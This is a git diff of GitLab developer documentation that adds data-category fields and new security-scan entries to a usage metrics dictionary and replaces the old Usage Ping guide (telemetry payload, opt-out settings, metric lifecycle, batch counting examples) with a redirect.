`data_available` Tiers: `free`, `premium`, `ultimate` @@ -18980,11 +22474,13 @@ Count of unique projects with an incident created in the last month [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180524_projects_with_incidents.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `free`, `premium`, `ultimate` ### `usage_activity_by_stage_monthly.monitor.projects_with_tracing_enabled` @@ -18994,6 +22490,8 @@ Projects with tracing enabled Group: `group::monitor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -19006,6 +22504,8 @@ The total number of projects in a given month with at least one package Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -19018,6 +22518,8 @@ Count of MAU creating assignee lists on Boards Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -19030,6 +22532,8 @@ Missing description Group: `group::plan` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -19042,6 +22546,8 @@ Count of users creating Issues in last 28 days. Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -19054,6 +22560,8 @@ Count of MAU creating label lists on Boards Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -19066,6 +22574,8 @@ Count of MAU created milestone lists on Boards Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -19078,6 +22588,8 @@ Count of MAU commenting on an issuable Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -19090,6 +22602,8 @@ Count of MAU creating projects Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -19102,6 +22616,8 @@ Missing description Group: `group::plan` +Data Category: `Operational` + Status: `data_available` Tiers: `free` @@ -19114,6 +22630,8 @@ Missing description Group: `group::plan` +Data Category: `Operational` + Status: `data_available` Tiers: `free` @@ -19126,6 +22644,8 @@ Missing description Group: `group::plan` +Data Category: `Operational` + Status: `data_available` Tiers: `free` @@ -19138,6 +22658,8 @@ Missing description Group: `group::plan` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -19150,6 +22672,8 @@ Missing description Group: `group::plan` +Data Category: `Operational` + Status: `data_available` Tiers: `free` @@ -19162,6 +22686,8 @@ Count of MAU creating todos Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -19174,6 +22700,8 @@ Unique users triggering deployments Group: `group::release` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -19186,6 +22714,8 @@ Total failed deployments Group: `group::release` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -19198,6 +22728,8 @@ Count creator_id from projects with repository mirroring enabled. Group: `group::pipeline execution` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -19210,6 +22742,8 @@ Unique users creating release tags Group: `group::release` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -19222,6 +22756,8 @@ Total successful deployments Group: `group::release` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -19234,6 +22770,8 @@ Counts of Pipelines that have at least 1 API Fuzzing Testing job Group: `group::fuzz testing` +Data Category: `Operational` + Status: `data_available` Tiers: `ultimate` @@ -19246,10 +22784,40 @@ Missing description Group: `` +Data Category: `Operational` + Status: `data_available` Tiers: `free` +### `usage_activity_by_stage_monthly.secure.cluster_image_scanning_pipeline` + +Pipelines containing a Cluster Image Scanning job + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210618125224_cluster_image_scanning_pipeline.yml) + +Group: `group::container security` + +Data Category: `Optional` + +Status: `implemented` + +Tiers: `ultimate` + +### `usage_activity_by_stage_monthly.secure.cluster_image_scanning_scans` + +Counts cluster image scanning jobs + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210618101233_cluster_image_scanning_scans.yml) + +Group: `group::container security` + +Data Category: `Optional` + +Status: `implemented` + +Tiers: `ultimate` + ### `usage_activity_by_stage_monthly.secure.container_scanning_pipeline` Pipelines containing a Container Scanning job @@ -19258,6 +22826,8 @@ Pipelines containing a Container Scanning job Group: `group::container security` +Data Category: `Operational` + Status: `data_available` Tiers: `ultimate` @@ -19270,6 +22840,8 @@ Missing description Group: `` +Data Category: `Operational` + Status: `data_available` Tiers: `free` @@ -19282,6 +22854,8 @@ Counts of Pipelines that have at least 1 coverage-guided Fuzz Testing job Group: `group::fuzz testing` +Data Category: `Operational` + Status: `data_available` Tiers: `ultimate` @@ -19294,6 +22868,8 @@ Missing description Group: `` +Data Category: `Operational` + Status: `data_available` Tiers: `free` @@ -19306,6 +22882,8 @@ Count of pipelines that have at least 1 DAST job Group: `group::dynamic analysis` +Data Category: `Operational` + Status: `data_available` Tiers: `ultimate` @@ -19318,6 +22896,8 @@ Missing description Group: `` +Data Category: `Operational` + Status: `data_available` Tiers: `free` @@ -19330,6 +22910,8 @@ Count of pipelines with successful Dependency Scanning jobs Group: `group::composition analysis` +Data Category: `Operational` + Status: `data_available` Tiers: `ultimate` @@ -19342,6 +22924,8 @@ Monthly number of users running Dependency Scanning Scans Group: `group::composition analysis` +Data Category: `Operational` + Status: `data_available` Tiers: `ultimate` @@ -19354,6 +22938,8 @@ Counts of Pipelines that have at least 1 SAST job Group: `group::static analysis` +Data Category: `Operational` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -19366,6 +22952,8 @@ Missing description Group: `` +Data Category: `Operational` + Status: `data_available` Tiers: `free` @@ -19378,6 +22966,8 @@ Counts of Pipelines that have at least 1 Secret Detection job Group: `group::static analysis` +Data Category: `Operational` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -19390,6 +22980,8 @@ Missing description Group: `` +Data Category: `Operational` + Status: `data_available` Tiers: `free` @@ -19402,6 +22994,8 @@ Count of API Fuzzing `docker-in-docker` jobs by job names Group: `group::fuzz testing` +Data Category: `Operational` + Status: `data_available` Tiers: `free` @@ -19414,10 +23008,26 @@ Count of API Fuzzing jobs by job name Group: `group::fuzz testing` +Data Category: `Operational` + Status: `data_available` Tiers: `free` +### `usage_activity_by_stage_monthly.secure.user_api_fuzzing_scans` + +Number of users who have run a API Fuzzing scan + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210607043622_user_api_fuzzing_scans.yml) + +Group: `category::fuzz testing` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `ultimate` + ### `usage_activity_by_stage_monthly.secure.user_container_scanning_jobs` Distinct count per user of Container Scanning jobs run monthly @@ -19426,6 +23036,22 @@ Distinct count per user of Container Scanning jobs run monthly Group: `group::container security` +Data Category: `Operational` + +Status: `data_available` + +Tiers: `ultimate` + +### `usage_activity_by_stage_monthly.secure.user_container_scanning_scans` + +Number of users who have run a Container Scanning scan + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210607043336_user_container_scanning_scans.yml) + +Group: `group::composition analysis` + +Data Category: `Operational` + Status: `data_available` Tiers: `ultimate` @@ -19438,10 +23064,26 @@ Missing description Group: `` +Data Category: `Operational` + Status: `data_available` Tiers: `free` +### `usage_activity_by_stage_monthly.secure.user_coverage_fuzzing_scans` + +Number of users who have run a Coverage Fuzzing scan + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210607043509_user_coverage_fuzzing_scans.yml) + +Group: `category::fuzz testing` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `ultimate` + ### `usage_activity_by_stage_monthly.secure.user_dast_jobs` Users who run a DAST job @@ -19450,10 +23092,26 @@ Users who run a DAST job Group: `group::dynamic analysis` +Data Category: `Operational` + Status: `data_available` Tiers: `free` +### `usage_activity_by_stage_monthly.secure.user_dast_scans` + +Number of users who have run a DAST scan + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210607041718_user_dast_scans.yml) + +Group: `group::dynamic analysis` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `ultimate` + ### `usage_activity_by_stage_monthly.secure.user_dependency_scanning_jobs` Monthly number of users creating Dependency Scanning jobs @@ -19462,6 +23120,22 @@ Monthly number of users creating Dependency Scanning jobs Group: `group::composition analysis` +Data Category: `Operational` + +Status: `data_available` + +Tiers: `ultimate` + +### `usage_activity_by_stage_monthly.secure.user_dependency_scanning_scans` + +Number of users who have run a Dependency Scanning scan + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210607043301_user_dependency_scanning_scans.yml) + +Group: `group::composition analysis` + +Data Category: `Operational` + Status: `data_available` Tiers: `ultimate` @@ -19474,6 +23148,8 @@ Monthly number of users running License Scanning jobs Group: `group::composition analysis` +Data Category: `Operational` + Status: `data_available` Tiers: `ultimate` @@ -19486,6 +23162,8 @@ Users who set personal preference to see Security Dashboard on Group information Group: `group::threat insights` +Data Category: `Operational` + Status: `data_available` Tiers: `ultimate` @@ -19498,10 +23176,26 @@ Users who run a SAST job Group: `group::static analysis` +Data Category: `Operational` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` +### `usage_activity_by_stage_monthly.secure.user_sast_scans` + +Number of users who have run a SAST scan + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210607043218_user_sast_scans.yml) + +Group: `group::static analysis` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `ultimate` + ### `usage_activity_by_stage_monthly.secure.user_secret_detection_jobs` Users who run a Secret Detection job @@ -19510,10 +23204,26 @@ Users who run a Secret Detection job Group: `group::static analysis` +Data Category: `Operational` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` +### `usage_activity_by_stage_monthly.secure.user_secret_detection_scans` + +Number of users who have run a Secret Detection scan + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210607043410_user_secret_detection_scans.yml) + +Group: `group::static analysis` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `ultimate` + ### `usage_activity_by_stage_monthly.secure.user_unique_users_all_secure_scanners` Missing description @@ -19522,6 +23232,8 @@ Missing description Group: `group::secure` +Data Category: `Operational` + Status: `data_available` Tiers: `free` @@ -19534,6 +23246,8 @@ Unique monthly builds in project Group: `group::pipeline execution` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -19546,6 +23260,8 @@ Total pipelines in external repositories in a month Group: `group::pipeline execution` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -19558,6 +23274,8 @@ Total pipelines in GitLab repositories in a month Group: `group::pipeline execution` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -19570,6 +23288,8 @@ Total pipelines from an Auto DevOps template Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -19582,6 +23302,8 @@ Total Monthly Pipelines from templates in repository Group: `group::pipeline execution` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -19594,6 +23316,8 @@ Total monthly Pipeline schedules in GitLab Group: `group::pipeline execution` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -19606,6 +23330,8 @@ Distinct users triggering pipelines in a month Group: `group::pipeline execution` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate`, `free` @@ -19618,6 +23344,8 @@ Total configured Triggers in project Group: `group::pipeline execution` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -19630,6 +23358,8 @@ Total GitLab Managed clusters with Runner enabled Group: `group::runner` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -19642,6 +23372,8 @@ Projects with a GitHub repository mirror pipeline enabled Group: `group::pipeline execution` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -19654,6 +23386,8 @@ GitLab instance unique identifier Group: `group::product intelligence` +Data Category: `Standard` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -19666,6 +23400,8 @@ Version of GitLab instance Group: `group::distribution` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -19678,6 +23414,8 @@ Whether Web IDE clientside preview is enabled Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` diff --git a/doc/development/usage_ping/index.md b/doc/development/usage_ping/index.md index de6a234e20c..aa06cb36f0c 100644 --- a/doc/development/usage_ping/index.md +++ b/doc/development/usage_ping/index.md @@ -1,1579 +1,9 @@ --- -stage: Growth -group: Product Intelligence -info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +redirect_to: '../service_ping/index.md' +remove_date: '2021-10-09' --- -# Usage Ping Guide +This file was moved to [another location](../service_ping/index.md). -> Introduced in GitLab Ultimate 11.2, more statistics. - -This guide describes Usage Ping's purpose and how it's implemented. - -For more information about Product Intelligence, see: - -- [Product Intelligence Guide](https://about.gitlab.com/handbook/product/product-intelligence-guide/) -- [Snowplow Guide](../snowplow/index.md) - -More links: - -- [Product Intelligence Direction](https://about.gitlab.com/direction/product-intelligence/) -- [Data Analysis Process](https://about.gitlab.com/handbook/business-ops/data-team/#data-analysis-process/) -- [Data for Product Managers](https://about.gitlab.com/handbook/business-ops/data-team/programs/data-for-product-managers/) -- [Data Infrastructure](https://about.gitlab.com/handbook/business-ops/data-team/platform/infrastructure/) - -## What is Usage Ping? - -Usage Ping is a process in GitLab that collects and sends a weekly payload to GitLab Inc. -The payload provides important high-level data that helps our product, support, -and sales teams understand how GitLab is used. For example, the data helps to: - -- Compare counts month over month (or week over week) to get a rough sense for how an instance uses - different product features. -- Collect other facts that help us classify and understand GitLab installations. -- Calculate our Stage Monthly Active Users (SMAU), which helps to measure the success of our stages - and features. - -Usage Ping information is not anonymous. It's linked to the instance's hostname. However, it does -not contain project names, usernames, or any other specific data. - -Sending a Usage Ping payload is optional and can be [disabled](#disable-usage-ping) on any instance. -When Usage Ping is enabled, GitLab gathers data from the other instances -and can show your instance's usage statistics to your users. - -### Terminology - -We use the following terminology to describe the Usage Ping components: - -- **Usage Ping**: the process that collects and generates a JSON payload. -- **Usage data**: the contents of the Usage Ping JSON payload. This includes metrics. -- **Metrics**: primarily made up of row counts for different tables in an instance's database. Each - metric has a corresponding [metric definition](metrics_dictionary.md#metrics-definition-and-validation) - in a YAML file. - -### Why should we enable Usage Ping? - -- The main purpose of Usage Ping is to build a better GitLab. Data about how GitLab is used is collected to better understand feature/stage adoption and usage, which helps us understand how GitLab is adding value and helps our team better understand the reasons why people use GitLab and with this knowledge we're able to make better product decisions. -- As a benefit of having the usage ping active, GitLab lets you analyze the users' activities over time of your GitLab installation. -- As a benefit of having the usage ping active, GitLab provides you with The DevOps Report,which gives you an overview of your entire instance's adoption of Concurrent DevOps from planning to monitoring. -- You get better, more proactive support. (assuming that our TAMs and support organization used the data to deliver more value) -- You get insight and advice into how to get the most value out of your investment in GitLab. Wouldn't you want to know that a number of features or values are not being adopted in your organization? -- You get a report that illustrates how you compare against other similar organizations (anonymized), with specific advice and recommendations on how to improve your DevOps processes. -- Usage Ping is enabled by default. To disable it, see [Disable Usage Ping](#disable-usage-ping). - -### Limitations - -- Usage Ping does not track frontend events things like page views, link clicks, or user sessions, and only focuses on aggregated backend events. -- Because of these limitations we recommend instrumenting your products with Snowplow for more detailed analytics on GitLab.com and use Usage Ping to track aggregated backend events on self-managed. - -## Usage Ping payload - -You can view the exact JSON payload sent to GitLab Inc. in the administration panel. To view the payload: - -1. Sign in as a user with [Administrator](../../user/permissions.md) permissions. -1. On the top bar, select **Menu >** **{admin}** **Admin**. -1. On the left sidebar, select **Settings > Metrics and profiling**. -1. Expand the **Usage statistics** section. -1. Select **Preview payload**. - -For an example payload, see [Example Usage Ping payload](#example-usage-ping-payload). - -## Disable Usage Ping - -To disable Usage Ping in the GitLab UI: - -1. Sign in as a user with [Administrator](../../user/permissions.md) permissions. -1. On the top bar, select **Menu >** **{admin}** **Admin**. -1. On the left sidebar, select **Settings > Metrics and profiling**. -1. Expand the **Usage statistics** section. -1. Clear the **Enable usage ping** checkbox and select **Save changes**. - -To disable Usage Ping and prevent it from being configured in the future through -the administration panel, Omnibus installs can set the following in -[`gitlab.rb`](https://docs.gitlab.com/omnibus/settings/configuration.html#configuration-options): - -```ruby -gitlab_rails['usage_ping_enabled'] = false -``` - -Source installations can set the following in `gitlab.yml`: - -```yaml -production: &base - # ... - gitlab: - # ... - usage_ping_enabled: false -``` - -## Usage Ping request flow - -The following example shows a basic request/response flow between a GitLab instance, the Versions Application, the License Application, Salesforce, the GitLab S3 Bucket, the GitLab Snowflake Data Warehouse, and Sisense: - -```mermaid -sequenceDiagram - participant GitLab Instance - participant Versions Application - participant Licenses Application - participant Salesforce - participant S3 Bucket - participant Snowflake DW - participant Sisense Dashboards - GitLab Instance->>Versions Application: Send Usage Ping - loop Process usage data - Versions Application->>Versions Application: Parse usage data - Versions Application->>Versions Application: Write to database - Versions Application->>Versions Application: Update license ping time - end - loop Process data for Salesforce - Versions Application-xLicenses Application: Request Zuora subscription id - Licenses Application-xVersions Application: Zuora subscription id - Versions Application-xSalesforce: Request Zuora account id by Zuora subscription id - Salesforce-xVersions Application: Zuora account id - Versions Application-xSalesforce: Usage data for the Zuora account - end - Versions Application->>S3 Bucket: Export Versions database - S3 Bucket->>Snowflake DW: Import data - Snowflake DW->>Snowflake DW: Transform data using dbt - Snowflake DW->>Sisense Dashboards: Data available for querying - Versions Application->>GitLab Instance: DevOps Report (Conversational Development Index) -``` - -## How Usage Ping works - -1. The Usage Ping [cron job](https://gitlab.com/gitlab-org/gitlab/-/blob/master/app/workers/gitlab_usage_ping_worker.rb#L30) is set in Sidekiq to run weekly. -1. When the cron job runs, it calls [`Gitlab::UsageData.to_json`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/app/services/submit_usage_ping_service.rb#L22). -1. `Gitlab::UsageData.to_json` [cascades down](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/usage_data.rb#L22) to ~400+ other counter method calls. -1. The response of all methods calls are [merged together](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/usage_data.rb#L14) into a single JSON payload in `Gitlab::UsageData.to_json`. -1. The JSON payload is then [posted to the Versions application]( https://gitlab.com/gitlab-org/gitlab/-/blob/master/app/services/submit_usage_ping_service.rb#L20) - If a firewall exception is needed, the required URL depends on several things. If - the hostname is `version.gitlab.com`, the protocol is `TCP`, and the port number is `443`, - the required URL is <https://version.gitlab.com/>. - -## Usage Ping Metric Life cycle - -### 1. New metrics addition - -Please follow the [Implementing Usage Ping](#implementing-usage-ping) guide. - -### 2. Existing metric change - -Because we do not control when customers update their self-managed instances of GitLab, -we **STRONGLY DISCOURAGE** changes to the logic used to calculate any metric. -Any such changes lead to inconsistent reports from multiple GitLab instances. -If there is a problem with an existing metric, it's best to deprecate the existing metric, -and use it, side by side, with the desired new metric. - -Example: -Consider following change. Before GitLab 12.6, the `example_metric` was implemented as: - -```ruby -{ - ... - example_metric: distinct_count(Project, :creator_id) -} -``` - -For GitLab 12.6, the metric was changed to filter out archived projects: - -```ruby -{ - ... - example_metric: distinct_count(Project.non_archived, :creator_id) -} -``` - -In this scenario all instances running up to GitLab 12.5 continue to report `example_metric`, -including all archived projects, while all instances running GitLab 12.6 and higher filters -out such projects. As Usage Ping data is collected from all reporting instances, the -resulting dataset includes mixed data, which distorts any following business analysis. - -The correct approach is to add a new metric for GitLab 12.6 release with updated logic: - -```ruby -{ - ... - example_metric_without_archived: distinct_count(Project.non_archived, :creator_id) -} -``` - -and update existing business analysis artefacts to use `example_metric_without_archived` instead of `example_metric` - -### 3. Deprecate a metric - -If a metric is obsolete and you no longer use it, you can mark it as deprecated. - -For an example of the metric deprecation process take a look at this [example merge request](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/59899) - -To deprecate a metric: - -1. Check the following YAML files and verify the metric is not used in an aggregate: - - [`config/metrics/aggregates/*.yaml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/aggregates/) - - [`ee/config/metrics/aggregates/*.yaml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/aggregates/) - -1. Create an issue in the [GitLab Data Team - project](https://gitlab.com/gitlab-data/analytics/-/issues). Ask for - confirmation that the metric is not used by other teams, or in any of the SiSense - dashboards. - -1. Verify the metric is not used to calculate the conversational index. The - conversational index is a measure that reports back to self-managed instances - to inform administrators of the progress of DevOps adoption for the instance. - - You can check - [`CalculateConvIndexService`](https://gitlab.com/gitlab-services/version-gitlab-com/-/blob/master/app/services/calculate_conv_index_service.rb) - to view the metrics that are used. The metrics are represented - as the keys that are passed as a field argument into the `get_value` method. - -1. Document the deprecation in the metric's YAML definition. Set - the `status:` attribute to `deprecated`, for example: - - ```yaml - --- - key_path: analytics_unique_visits.analytics_unique_visits_for_any_target_monthly - description: Visits to any of the pages listed above per month - product_section: dev - product_stage: manage - product_group: group::analytics - product_category: - value_type: number - status: deprecated - time_frame: 28d - data_source: - distribution: - - ce - tier: - - free - ``` - -1. Replace the metric's instrumentation with a fixed value. This avoids wasting - resources to calculate the deprecated metric. In - [`lib/gitlab/usage_data.rb`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/usage_data.rb) - or - [`ee/lib/ee/gitlab/usage_data.rb`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/lib/ee/gitlab/usage_data.rb), - replace the code that calculates the metric's value with a fixed value that - indicates it's deprecated: - - ```ruby - module Gitlab - class UsageData - DEPRECATED_VALUE = -1000 - - def analytics_unique_visits_data - results['analytics_unique_visits_for_any_target'] = redis_usage_data { unique_visit_service.unique_visits_for(targets: :analytics) } - results['analytics_unique_visits_for_any_target_monthly'] = DEPRECATED_VALUE - - { analytics_unique_visits: results } - end - # ... - end - end - ``` - -1. Update the Metrics Dictionary following [guidelines instructions](dictionary.md). - -### 4. Remove a metric - -Only deprecated metrics can be removed from Usage Ping. - -For an example of the metric removal process take a look at this [example issue](https://gitlab.com/gitlab-org/gitlab/-/issues/297029) - -To remove a deprecated metric: - -1. Verify that removing the metric from the Usage Ping payload does not cause - errors in [Version App](https://gitlab.com/gitlab-services/version-gitlab-com) - when the updated payload is collected and processed. Version App collects - and persists all Usage Ping reports. To do that you can modify - [fixtures](https://gitlab.com/gitlab-services/version-gitlab-com/-/blob/master/spec/support/usage_data_helpers.rb#L540) - used to test - [`UsageDataController#create`](https://gitlab.com/gitlab-services/version-gitlab-com/-/blob/3760ef28/spec/controllers/usage_data_controller_spec.rb#L75) - endpoint, and assure that test suite does not fail when metric that you wish to remove is not included into test payload. - -1. Create an issue in the - [GitLab Data Team project](https://gitlab.com/gitlab-data/analytics/-/issues). - Ask for confirmation that the metric is not referred to in any SiSense dashboards and - can be safely removed from Usage Ping. Use this - [example issue](https://gitlab.com/gitlab-data/analytics/-/issues/7539) for guidance. - This step can be skipped if verification done during [deprecation process](#3-deprecate-a-metric) - reported that metric is not required by any data transformation in Snowflake data warehouse nor it is - used by any of SiSense dashboards. - -1. After you verify the metric can be safely removed, - update the attributes of the metric's YAML definition: - - - Set the `status:` to `removed`. - - Set `milestone_removed:` to the number of the - milestone in which the metric was removed. - - Do not remove the metric's YAML definition altogether. Some self-managed - instances might not immediately update to the latest version of GitLab, and - therefore continue to report the removed metric. The Product Intelligence team - requires a record of all removed metrics in order to identify and filter them. - - For example please take a look at this [merge request](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/60149/diffs#b01f429a54843feb22265100c0e4fec1b7da1240_10_10). - -1. After you verify the metric can be safely removed, - remove the metric's instrumentation from - [`lib/gitlab/usage_data.rb`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/usage_data.rb) - or - [`ee/lib/ee/gitlab/usage_data.rb`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/lib/ee/gitlab/usage_data.rb). - - For example please take a look at this [merge request](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/60149/diffs#6335dc533bd21df26db9de90a02dd66278c2390d_167_167). - -1. Remove any other records related to the metric: - - The feature flag YAML file at [`config/feature_flags/*/*.yaml`](https://gitlab.com/gitlab-org/gitlab/-/tree/master/config/feature_flags). - - The entry in the known events YAML file at [`lib/gitlab/usage_data_counters/known_events/*.yaml`](https://gitlab.com/gitlab-org/gitlab/-/tree/master/lib/gitlab/usage_data_counters/known_events). - -1. Update the Metrics Dictionary following [guidelines instructions](dictionary.md). - -## Implementing Usage Ping - -Usage Ping consists of two kinds of data, counters and observations. Counters track how often a certain event -happened over time, such as how many CI pipelines have run. They are monotonic and always trend up. -Observations are facts collected from one or more GitLab instances and can carry arbitrary data. There are no -general guidelines around how to collect those, due to the individual nature of that data. - -There are several types of counters which are all found in `usage_data.rb`: - -- **Ordinary Batch Counters:** Simple count of a given ActiveRecord_Relation -- **Distinct Batch Counters:** Distinct count of a given ActiveRecord_Relation in a given column -- **Sum Batch Counters:** Sum the values of a given ActiveRecord_Relation in a given column -- **Alternative Counters:** Used for settings and configurations -- **Redis Counters:** Used for in-memory counts. - -NOTE: -Only use the provided counter methods. Each counter method contains a built in fail safe to isolate each counter to avoid breaking the entire Usage Ping. - -### Why batch counting - -For large tables, PostgreSQL can take a long time to count rows due to MVCC [(Multi-version Concurrency Control)](https://en.wikipedia.org/wiki/Multiversion_concurrency_control). Batch counting is a counting method where a single large query is broken into multiple smaller queries. For example, instead of a single query querying 1,000,000 records, with batch counting, you can execute 100 queries of 10,000 records each. Batch counting is useful for avoiding database timeouts as each batch query is significantly shorter than one single long running query. - -For GitLab.com, there are extremely large tables with 15 second query timeouts, so we use batch counting to avoid encountering timeouts. Here are the sizes of some GitLab.com tables: - -| Table | Row counts in millions | -|------------------------------|------------------------| -| `merge_request_diff_commits` | 2280 | -| `ci_build_trace_sections` | 1764 | -| `merge_request_diff_files` | 1082 | -| `events` | 514 | - -The following operation methods are available for your use: - -- [Ordinary Batch Counters](#ordinary-batch-counters) -- [Distinct Batch Counters](#distinct-batch-counters) -- [Sum Batch Operation](#sum-batch-operation) -- [Add Operation](#add-operation) -- [Estimated Batch Counters](#estimated-batch-counters) - -Batch counting requires indexes on columns to calculate max, min, and range queries. In some cases, -you may need to add a specialized index on the columns involved in a counter. - -### Ordinary Batch Counters - -Handles `ActiveRecord::StatementInvalid` error - -Simple count of a given `ActiveRecord_Relation`, does a non-distinct batch count, smartly reduces `batch_size`, and handles errors. - -Method: `count(relation, column = nil, batch: true, start: nil, finish: nil)` - -Arguments: - -- `relation` the ActiveRecord_Relation to perform the count -- `column` the column to perform the count on, by default is the primary key -- `batch`: default `true` to use batch counting -- `start`: custom start of the batch counting to avoid complex min calculations -- `end`: custom end of the batch counting to avoid complex min calculations - -Examples: - -```ruby -count(User.active) -count(::Clusters::Cluster.aws_installed.enabled, :cluster_id) -count(::Clusters::Cluster.aws_installed.enabled, :cluster_id, start: ::Clusters::Cluster.minimum(:id), finish: ::Clusters::Cluster.maximum(:id)) -``` - -### Distinct Batch Counters - -Handles `ActiveRecord::StatementInvalid` error - -Distinct count of a given `ActiveRecord_Relation` on given column, a distinct batch count, smartly reduces `batch_size`, and handles errors. - -Method: `distinct_count(relation, column = nil, batch: true, batch_size: nil, start: nil, finish: nil)` - -Arguments: - -- `relation` the ActiveRecord_Relation to perform the count -- `column` the column to perform the distinct count, by default is the primary key -- `batch`: default `true` to use batch counting -- `batch_size`: if none set it uses default value 10000 from `Gitlab::Database::BatchCounter` -- `start`: custom start of the batch counting to avoid complex min calculations -- `end`: custom end of the batch counting to avoid complex min calculations - -WARNING: -Counting over non-unique columns can lead to performance issues. Take a look at the [iterating tables in batches](../iterating_tables_in_batches.md) guide for more details. - -Examples: - -```ruby -distinct_count(::Project, :creator_id) -distinct_count(::Note.with_suggestions.where(time_period), :author_id, start: ::User.minimum(:id), finish: ::User.maximum(:id)) -distinct_count(::Clusters::Applications::CertManager.where(time_period).available.joins(:cluster), 'clusters.user_id') -``` - -### Sum Batch Operation - -Handles `ActiveRecord::StatementInvalid` error - -Sum the values of a given ActiveRecord_Relation on given column and handles errors. - -Method: `sum(relation, column, batch_size: nil, start: nil, finish: nil)` - -Arguments: - -- `relation` the ActiveRecord_Relation to perform the operation -- `column` the column to sum on -- `batch_size`: if none set it uses default value 1000 from `Gitlab::Database::BatchCounter` -- `start`: custom start of the batch counting to avoid complex min calculations -- `end`: custom end of the batch counting to avoid complex min calculations - -Examples: - -```ruby -sum(JiraImportState.finished, :imported_issues_count) -``` - -### Grouping & Batch Operations - -The `count`, `distinct_count`, and `sum` batch counters can accept an `ActiveRecord::Relation` -object, which groups by a specified column. With a grouped relation, the methods do batch counting, -handle errors, and returns a hash table of key-value pairs. - -Examples: - -```ruby -count(Namespace.group(:type)) -# returns => {nil=>179, "Group"=>54} - -distinct_count(Project.group(:visibility_level), :creator_id) -# returns => {0=>1, 10=>1, 20=>11} - -sum(Issue.group(:state_id), :weight)) -# returns => {1=>3542, 2=>6820} -``` - -### Add Operation - -Handles `StandardError`. - -Returns `-1` if any of the arguments are `-1`. - -Sum the values given as parameters. - -Method: `add(*args)` - -Examples - -```ruby -project_imports = distinct_count(::Project.where.not(import_type: nil), :creator_id) -bulk_imports = 